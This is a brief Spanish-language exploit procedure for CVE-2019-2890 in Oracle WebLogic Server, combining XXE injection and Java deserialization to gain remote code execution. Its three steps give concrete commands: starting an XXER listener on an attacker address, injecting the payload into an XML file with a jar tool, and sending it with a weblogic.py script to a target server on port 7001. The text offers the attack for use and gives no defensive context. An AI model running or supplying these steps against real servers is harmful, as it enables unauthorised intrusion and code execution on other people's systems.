
Exploit para CVE-2019-2890 dirigido a Oracle WebLogic Server mediante inyección XXE y deserialización, lo que permite la ejecución remota de código a través de payloads manipulados.
1)Iniciar la herramienta XXER python xxer.py -H 192.168.17.223
2)Colocar el PoC de xxer en el archivo xx.xml, reemplazar los datos serializados e inyectar el PoC de xxer; java -jar weblogic_xxe.jar xx.xml
3)Usar la herramienta java-deserialization-exploit, específicamente weblogic.py, para enviar los datos al servidor WebLogic python weblogic.py 192.168.17.222 7001 weblogic